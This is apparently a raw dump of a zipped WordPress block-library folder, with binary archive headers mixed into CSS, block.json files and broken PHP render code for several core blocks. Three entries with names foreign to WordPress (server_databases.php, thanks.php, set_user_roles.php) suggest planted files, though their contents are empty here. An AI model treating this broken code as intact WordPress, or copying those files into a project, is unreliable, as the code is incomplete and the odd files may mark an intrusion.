.wp-block-button__link{font-size:inherit}.wp-block-button.aligncenter{text-align:center}PK6[obuttons/editor.cssnu[.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{ margin:0; } .wp-block-buttons>.block-list-appender{ align-items:center; display:inline-flex; } .wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{ justify-content:flex-start; } .wp-block-buttons>.wp-block-button:focus{ box-shadow:none; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{ margin-left:auto; margin-right:auto; margin-top:0; width:100%; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{ margin-bottom:0; } .editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block[data-align=center]>.wp-block-buttons{ align-items:center; justify-content:center; } .wp-block[data-align=right]>.wp-block-buttons{ justify-content:flex-end; }PK6[沎,buttons/style.min.cssnu[.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-button.aligncenter{text-align:center}PK6[obuttons/editor-rtl.cssnu[.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{ margin:0; } .wp-block-buttons>.block-list-appender{ align-items:center; display:inline-flex; } .wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{ justify-content:flex-start; } .wp-block-buttons>.wp-block-button:focus{ box-shadow:none; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{ margin-left:auto; margin-right:auto; margin-top:0; width:100%; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{ margin-bottom:0; } .editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block[data-align=center]>.wp-block-buttons{ align-items:center; justify-content:center; } .wp-block[data-align=right]>.wp-block-buttons{ justify-content:flex-end; }PK6[/xWIUUbuttons/editor-rtl.min.cssnu[.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{margin:0}.wp-block-buttons>.block-list-appender{align-items:center;display:inline-flex}.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{justify-content:flex-start}.wp-block-buttons>.wp-block-button:focus{box-shadow:none}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{margin-left:auto;margin-right:auto;margin-top:0;width:100%}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{margin-bottom:0}.editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block[data-align=center]>.wp-block-buttons{align-items:center;justify-content:center}.wp-block[data-align=right]>.wp-block-buttons{justify-content:flex-end}PK6[pzzbuttons/style-rtl.cssnu[.wp-block-buttons.is-vertical{ flex-direction:column; } .wp-block-buttons.is-vertical>.wp-block-button:last-child{ margin-bottom:0; } .wp-block-buttons>.wp-block-button{ display:inline-block; margin:0; } .wp-block-buttons.is-content-justification-left{ justify-content:flex-start; } .wp-block-buttons.is-content-justification-left.is-vertical{ align-items:flex-start; } .wp-block-buttons.is-content-justification-center{ justify-content:center; } .wp-block-buttons.is-content-justification-center.is-vertical{ align-items:center; } .wp-block-buttons.is-content-justification-right{ justify-content:flex-end; } .wp-block-buttons.is-content-justification-right.is-vertical{ align-items:flex-end; } .wp-block-buttons.is-content-justification-space-between{ justify-content:space-between; } .wp-block-buttons.aligncenter{ text-align:center; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{ margin-left:auto; margin-right:auto; width:100%; } .wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-button.aligncenter{ text-align:center; }PK6[pzzbuttons/style.cssnu[.wp-block-buttons.is-vertical{ flex-direction:column; } .wp-block-buttons.is-vertical>.wp-block-button:last-child{ margin-bottom:0; } .wp-block-buttons>.wp-block-button{ display:inline-block; margin:0; } .wp-block-buttons.is-content-justification-left{ justify-content:flex-start; } .wp-block-buttons.is-content-justification-left.is-vertical{ align-items:flex-start; } .wp-block-buttons.is-content-justification-center{ justify-content:center; } .wp-block-buttons.is-content-justification-center.is-vertical{ align-items:center; } .wp-block-buttons.is-content-justification-right{ justify-content:flex-end; } .wp-block-buttons.is-content-justification-right.is-vertical{ align-items:flex-end; } .wp-block-buttons.is-content-justification-space-between{ justify-content:space-between; } .wp-block-buttons.aligncenter{ text-align:center; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{ margin-left:auto; margin-right:auto; width:100%; } .wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-button.aligncenter{ text-align:center; }PK6[ɘNcalendar/block.jsonnu[{ "apiVersion": 2, "name": "core/calendar", "category": "widgets", "attributes": { "month": { "type": "integer" }, "year": { "type": "integer" } }, "supports": { "align": true }, "style": "wp-block-calendar" } PK6[calendar/server_databases.phpnu[PK6[qcalendar/style-rtl.min.cssnu[.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table:where(:not(.has-text-color)){color:#40464d}.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{border-color:#ddd}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}PK6[qcalendar/style.min.cssnu[.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table:where(:not(.has-text-color)){color:#40464d}.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{border-color:#ddd}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}PK6[Tkkmcalendar/style-rtl.cssnu[.wp-block-calendar{ text-align:center; } .wp-block-calendar td,.wp-block-calendar th{ border:1px solid; padding:.25em; } .wp-block-calendar th{ font-weight:400; } .wp-block-calendar caption{ background-color:inherit; } .wp-block-calendar table{ border-collapse:collapse; width:100%; } .wp-block-calendar table:where(:not(.has-text-color)){ color:#40464d; } .wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{ border-color:#ddd; } .wp-block-calendar table.has-background th{ background-color:inherit; } .wp-block-calendar table.has-text-color th{ color:inherit; } :where(.wp-block-calendar table:not(.has-background) th){ background:#ddd; }PK6[Tkkmcalendar/style.cssnu[.wp-block-calendar{ text-align:center; } .wp-block-calendar td,.wp-block-calendar th{ border:1px solid; padding:.25em; } .wp-block-calendar th{ font-weight:400; } .wp-block-calendar caption{ background-color:inherit; } .wp-block-calendar table{ border-collapse:collapse; width:100%; } .wp-block-calendar table:where(:not(.has-text-color)){ color:#40464d; } .wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{ border-color:#ddd; } .wp-block-calendar table.has-background th{ background-color:inherit; } .wp-block-calendar table.has-text-color th{ color:inherit; } :where(.wp-block-calendar table:not(.has-background) th){ background:#ddd; }PK6[p?!! calendar.phpnu[%2$s', $wrapper_attributes, get_calendar( true, false ) ); // phpcs:ignore WordPress.WP.GlobalVariablesOverride.OverrideProhibited $monthnum = $previous_monthnum; // phpcs:ignore WordPress.WP.GlobalVariablesOverride.OverrideProhibited $year = $previous_year; return $output; } /** * Registers the `core/calendar` block on server. */ function register_block_core_calendar() { register_block_type_from_metadata( __DIR__ . '/calendar', array( 'render_callback' => 'render_block_core_calendar', ) ); } add_action( 'init', 'register_block_core_calendar' ); PK6[:YRcategories/block.jsonnu[{ "apiVersion": 2, "name": "core/categories", "category": "widgets", "attributes": { "displayAsDropdown": { "type": "boolean", "default": false }, "showHierarchy": { "type": "boolean", "default": false }, "showPostCounts": { "type": "boolean", "default": false } }, "supports": { "align": true, "html": false }, "editorStyle": "wp-block-categories-editor", "style": "wp-block-categories" } PK6[categories/thanks.phpnu[PK6[4|dcategories/editor.min.cssnu[.wp-block-categories ul{padding-left:2.5em}.wp-block-categories ul ul{margin-top:6px}[data-align=center] .wp-block-categories{text-align:center}PK6[i9categories/style-rtl.min.cssnu[.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}PK6[١categories/editor.cssnu[.wp-block-categories ul{ padding-left:2.5em; } .wp-block-categories ul ul{ margin-top:6px; } [data-align=center] .wp-block-categories{ text-align:center; }PK6[i9categories/style.min.cssnu[.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}PK6[\ۢcategories/editor-rtl.cssnu[.wp-block-categories ul{ padding-right:2.5em; } .wp-block-categories ul ul{ margin-top:6px; } [data-align=center] .wp-block-categories{ text-align:center; }PK6[H?categories/editor-rtl.min.cssnu[.wp-block-categories ul{padding-right:2.5em}.wp-block-categories ul ul{margin-top:6px}[data-align=center] .wp-block-categories{text-align:center}PK6[ncategories/style-rtl.cssnu[.wp-block-categories{ box-sizing:border-box; } .wp-block-categories.alignleft{ margin-right:2em; } .wp-block-categories.alignright{ margin-left:2em; } .wp-block-categories.wp-block-categories-dropdown.aligncenter{ text-align:center; }PK6[ncategories/style.cssnu[.wp-block-categories{ box-sizing:border-box; } .wp-block-categories.alignleft{ margin-right:2em; } .wp-block-categories.alignright{ margin-left:2em; } .wp-block-categories.wp-block-categories-dropdown.aligncenter{ text-align:center; }PK6[dQ0 categories.phpnu[ false, 'hierarchical' => ! empty( $attributes['showHierarchy'] ), 'orderby' => 'name', 'show_count' => ! empty( $attributes['showPostCounts'] ), 'title_li' => '', ); if ( ! empty( $attributes['displayAsDropdown'] ) ) { $id = 'wp-block-categories-' . $block_id; $args['id'] = $id; $args['show_option_none'] = __( 'Select Category' ); $wrapper_markup = '
%2$s
'; $items_markup = wp_dropdown_categories( $args ); $type = 'dropdown'; if ( ! is_admin() ) { // Inject the dropdown script immediately after the select dropdown. $items_markup = preg_replace( '#(?<=)#', build_dropdown_script_block_core_categories( $id ), $items_markup, 1 ); } } else { $wrapper_markup = ''; $items_markup = wp_list_categories( $args ); $type = 'list'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => "wp-block-categories-{$type}" ) ); return sprintf( $wrapper_markup, $wrapper_attributes, $items_markup ); } /** * Generates the inline script for a categories dropdown field. * * @param string $dropdown_id ID of the dropdown field. * * @return string Returns the dropdown onChange redirection script. */ function build_dropdown_script_block_core_categories( $dropdown_id ) { ob_start(); ?> 'render_block_core_categories', ) ); } add_action( 'init', 'register_block_core_categories' ); PK6[ՠcode/block.jsonnu[{ "apiVersion": 2, "name": "core/code", "category": "text", "attributes": { "content": { "type": "string", "source": "html", "selector": "code" } }, "supports": { "anchor": true, "fontSize": true }, "style": "wp-block-code" } PK6[p w$$code/editor.min.cssnu[.wp-block-code code{background:none}PK6[EOcode/style-rtl.min.cssnu[.wp-block-code{box-sizing:border-box}.wp-block-code code{display:block;font-family:inherit;overflow-wrap:break-word;white-space:pre-wrap}PK6[kvЂcode/theme.cssnu[.wp-block-code{ border:1px solid #ccc; border-radius:4px; font-family:Menlo,Consolas,monaco,monospace; padding:.8em 1em; }PK6[؊Kttcode/theme-rtl.min.cssnu[.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}PK6[+))code/editor.cssnu[.wp-block-code code{ background:none; }PK6[؊Kttcode/theme.min.cssnu[.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}PK6[EOcode/style.min.cssnu[.wp-block-code{box-sizing:border-box}.wp-block-code code{display:block;font-family:inherit;overflow-wrap:break-word;white-space:pre-wrap}PK6[kvЂcode/theme-rtl.cssnu[.wp-block-code{ border:1px solid #ccc; border-radius:4px; font-family:Menlo,Consolas,monaco,monospace; padding:.8em 1em; }PK6[+))code/editor-rtl.cssnu[.wp-block-code code{ background:none; }PK6[p w$$code/editor-rtl.min.cssnu[.wp-block-code code{background:none}PK6[a8code/style-rtl.cssnu[.wp-block-code{ box-sizing:border-box; } .wp-block-code code{ display:block; font-family:inherit; overflow-wrap:break-word; white-space:pre-wrap; }PK6[a8code/style.cssnu[.wp-block-code{ box-sizing:border-box; } .wp-block-code code{ display:block; font-family:inherit; overflow-wrap:break-word; white-space:pre-wrap; }PK6[E\XGGcolumn/block.jsonnu[{ "apiVersion": 2, "name": "core/column", "category": "text", "parent": [ "core/columns" ], "attributes": { "verticalAlignment": { "type": "string" }, "width": { "type": "string" }, "templateLock": { "type": "string" } }, "supports": { "anchor": true, "reusable": false, "html": false } } PK6[>Ghhcolumns/block.jsonnu[{ "apiVersion": 2, "name": "core/columns", "category": "design", "attributes": { "verticalAlignment": { "type": "string" } }, "supports": { "anchor": true, "align": [ "wide", "full" ], "html": false, "color": { "gradients": true, "link": true } }, "editorStyle": "wp-block-columns-editor", "style": "wp-block-columns" } PK6[columns/set_user_roles.phpnu[PK6[+1+columns/editor.min.cssnu[.wp-block-columns :where(.wp-block){margin-left:0;margin-right:0;max-width:none}html :where(.wp-block-column){margin-bottom:0;margin-top:0}PK6[y columns/style-rtl.min.cssnu[.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}PK6[9.Ǡcolumns/editor.cssnu[.wp-block-columns :where(.wp-block){ margin-left:0; margin-right:0; max-width:none; } html :where(.wp-block-column){ margin-bottom:0; margin-top:0; }PK6[y columns/style.min.cssnu[.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}PK6[9.Ǡcolumns/editor-rtl.cssnu[.wp-block-columns :where(.wp-block){ margin-left:0; margin-right:0; max-width:none; } html :where(.wp-block-column){ margin-bottom:0; margin-top:0; }PK6[+1+columns/editor-rtl.min.cssnu[.wp-block-columns :where(.wp-block){margin-left:0;margin-right:0;max-width:none}html :where(.wp-block-column){margin-bottom:0;margin-top:0}PK6[.wp-block-column{ flex-basis:100% !important; } } @media (min-width:782px){ .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{ flex-grow:0; } } .wp-block-columns.is-not-stacked-on-mobile{ flex-wrap:nowrap !important; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{ flex-grow:0; } :where(.wp-block-columns){ margin-bottom:1.75em; } :where(.wp-block-columns.has-background){ padding:1.25em 2.375em; } .wp-block-column{ flex-grow:1; min-width:0; overflow-wrap:break-word; word-break:break-word; } .wp-block-column.is-vertically-aligned-top{ align-self:flex-start; } .wp-block-column.is-vertically-aligned-center{ align-self:center; } .wp-block-column.is-vertically-aligned-bottom{ align-self:flex-end; } .wp-block-column.is-vertically-aligned-stretch{ align-self:stretch; } .wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{ width:100%; }PK6[.wp-block-column{ flex-basis:100% !important; } } @media (min-width:782px){ .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{ flex-grow:0; } } .wp-block-columns.is-not-stacked-on-mobile{ flex-wrap:nowrap !important; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{ flex-grow:0; } :where(.wp-block-columns){ margin-bottom:1.75em; } :where(.wp-block-columns.has-background){ padding:1.25em 2.375em; } .wp-block-column{ flex-grow:1; min-width:0; overflow-wrap:break-word; word-break:break-word; } .wp-block-column.is-vertically-aligned-top{ align-self:flex-start; } .wp-block-column.is-vertically-aligned-center{ align-self:center; } .wp-block-column.is-vertically-aligned-bottom{ align-self:flex-end; } .wp-block-column.is-vertically-aligned-stretch{ align-self:stretch; } .wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{ width:100%; }PK6[2#YYembed/block.jsonnu[{ "apiVersion": 2, "name": "core/embed", "category": "embed", "attributes": { "url": { "type": "string" }, "caption": { "type": "string", "source": "html", "selector": "figcaption" }, "type": { "type": "string" }, "providerNameSlug": { "type": "string" }, "allowResponsive": { "type": "boolean", "default": true }, "responsive": { "type": "boolean", "default": false }, "previewable": { "type": "boolean", "default": true } }, "supports": { "align": true }, "editorStyle": "wp-block-embed-editor", "style": "wp-block-embed" } PK6[G݁nnembed/editor.min.cssnu[.wp-block-embed{clear:both;margin-left:0;margin-right:0}.wp-block-embed.is-loading{display:flex;justify-content:center}.wp-block-embed .components-placeholder__error{word-break:break-word}.wp-block-embed .components-placeholder__learn-more{margin-top:1em}.block-library-embed__interactive-overlay{bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{max-width:360px;width:100%}.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{min-width:280px}PK6[BL44embed/style-rtl.min.cssnu[.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}PK6[eYembed/theme.cssnu[.wp-block-embed figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-embed figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-embed{ margin:0 0 1em; }PK6[6embed/theme-rtl.min.cssnu[.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}PK6[ fembed/editor.cssnu[.wp-block-embed{ clear:both; margin-left:0; margin-right:0; } .wp-block-embed.is-loading{ display:flex; justify-content:center; } .wp-block-embed .components-placeholder__error{ word-break:break-word; } .wp-block-embed .components-placeholder__learn-more{ margin-top:1em; } .block-library-embed__interactive-overlay{ bottom:0; left:0; opacity:0; position:absolute; right:0; top:0; } .wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{ max-width:360px; width:100%; } .wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{ min-width:280px; }PK6[6embed/theme.min.cssnu[.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}PK6[BL44embed/style.min.cssnu[.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}PK6[eYembed/theme-rtl.cssnu[.wp-block-embed figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-embed figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-embed{ margin:0 0 1em; }PK6[ fembed/editor-rtl.cssnu[.wp-block-embed{ clear:both; margin-left:0; margin-right:0; } .wp-block-embed.is-loading{ display:flex; justify-content:center; } .wp-block-embed .components-placeholder__error{ word-break:break-word; } .wp-block-embed .components-placeholder__learn-more{ margin-top:1em; } .block-library-embed__interactive-overlay{ bottom:0; left:0; opacity:0; position:absolute; right:0; top:0; } .wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{ max-width:360px; width:100%; } .wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{ min-width:280px; }PK6[G݁nnembed/editor-rtl.min.cssnu[.wp-block-embed{clear:both;margin-left:0;margin-right:0}.wp-block-embed.is-loading{display:flex;justify-content:center}.wp-block-embed .components-placeholder__error{word-break:break-word}.wp-block-embed .components-placeholder__learn-more{margin-top:1em}.block-library-embed__interactive-overlay{bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{max-width:360px;width:100%}.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{min-width:280px}PK6[ǹembed/style-rtl.cssnu[.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{ max-width:360px; width:100%; } .wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{ min-width:280px; } .wp-block-cover .wp-block-embed{ min-height:240px; min-width:320px; } .wp-block-embed{ overflow-wrap:break-word; } .wp-block-embed figcaption{ margin-bottom:1em; margin-top:.5em; } .wp-block-embed iframe{ max-width:100%; } .wp-block-embed__wrapper{ position:relative; } .wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{ content:""; display:block; padding-top:50%; } .wp-embed-responsive .wp-has-aspect-ratio iframe{ bottom:0; height:100%; left:0; position:absolute; right:0; top:0; width:100%; } .wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{ padding-top:42.85%; } .wp-embed-responsive .wp-embed-aspect-18-9 